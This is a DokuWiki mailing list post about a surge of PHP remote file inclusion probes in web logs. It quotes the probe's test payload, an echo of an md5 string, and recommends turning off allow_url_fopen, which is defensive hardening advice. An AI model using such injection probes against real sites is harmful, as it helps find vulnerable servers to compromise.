Digging back through web log files, there has been a "surge" in this type of activity lately where the target is the <?php echo md5("just_a_test");?> but this type of exploit is nothing new.
Here is a decent recent article from CIAC explaining the issues in basic terms. These attempts appear to be targeting index.php in general, I found attempts in the logs of several non-dokuwiki sites as well. The issue is not with dokuwiki, but how you have configured PHP and your web server, hopefully allow_url_fopen = 'off' and you do not have anything that requires that capability or try to use cURL instead. Newer PHP uses a "wrapper" which can be used to restrict what can be included.
http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml Docs from PHP website: http://us2.php.net/filesystem See also: http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html
Recommendations You should disable allow_url_fopen in the php.ini file: ; Disable allow_url_fopen for security reasons allow_url_fopen = 'off' The setting can also be disabled in apache's httpd.conf file: # Disable allow_url_fopen for security reasons php_flag allow_url_fopen offFor remote file access, consider using the cURL functions that PHP provides.
Jonathan -- DokuWiki mailing list - more info at http://wiki.splitbrain.org/wiki:mailinglist
